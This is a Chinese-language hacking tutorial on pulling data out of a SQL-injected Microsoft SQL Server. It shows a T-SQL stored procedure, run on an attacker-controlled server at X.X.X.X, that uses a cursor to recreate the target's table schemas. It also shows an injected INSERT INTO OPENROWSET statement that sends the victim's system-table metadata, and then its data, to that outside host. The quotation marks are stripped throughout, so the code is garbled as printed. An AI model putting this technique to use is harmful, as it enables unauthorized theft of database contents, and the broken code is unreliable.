比较有效率的openrowset读表方案
痛苦的信仰
文章没有什么亮点,主要是希望方便以及做个T-SQL游标使用的例子供大家参考。
假设我们控制的SQL服务器叫X.X.X.X,我们注入一个目标,可以openrowset,对系统表有select权限
连接查询分析器建立扩展储存:
CREATE PROCEDURE view_open_table
AS
BEGIN
IF (select count(*) from sysobjects where name=open_table)=0
BEGIN
print No table [open_table] here,I will create it... ;
create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
ENDELSE
BEGIN
IF (select count(*) from open_table)>0
BEGIN
DECLARE @stmt varchar(1024),@t_name varchar(255),@c_name varchar(255),@c_type varchar(255),@c_length int;
DECLARE cur cursor FOR select table_name,column_name,column_type,column_length from open_table;
OPEN cur;
FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;
print Creating table .....;
SET @stmt = CREATE TABLE +@t_name + (;
WHILE @@fetch_status=0
BEGIN
IF (@c_type = nvarchar OR @c_type = varchar)
BEGIN SET @stmt = @stmt + @c_name + + @c_type + ( + CAST(@c_length AS varchar(255)) + ); END;
ELSE BEGIN SET @stmt = @stmt + @c_name + + @c_type; END;FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;
IF @@fetch_status!=0 BREAK;
SET @stmt = @stmt + ,;
END
CLOSE cur;
DEALLOCATE cur;
SET @stmt = @stmt + );
EXEC(@stmt);
END
END
END;这段代码是初始化环境的,建立一个叫open_table的表,结构如下:
create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
把扩展储存的代码注释掉,执行EXEC view_open_table完成初始化,在注入的机器,当然,任何可以执行对方SQL的地方都可以执行:insert into openroset(sqloledb,server=X.X.X.X;uid=sa;pwd=123,select * from open_table) select t.name as table_name,c.name as column_name,ty.name as column_type,c.length as column_length from master.dbo.sysobjects t,master.dbo.syscolumns c,master.dbo.systypes ty where t.name=cmd and t.xtype=char(85) and t.status>0 and t.id=c.id and c.xtype=ty.xtype and ty.name not in(sysname)
此时你的数据库里面已经包含了表cmd的结构:
当然是建立和对方一摸一样表,不过这个不用你操心了,再次执行EXEC view_open_table,看到creating table....就开始建表了,执行完毕你已经得到了一个和对方结构一摸一样,名字也一样的表。下面再open传回你要的数据就OK了
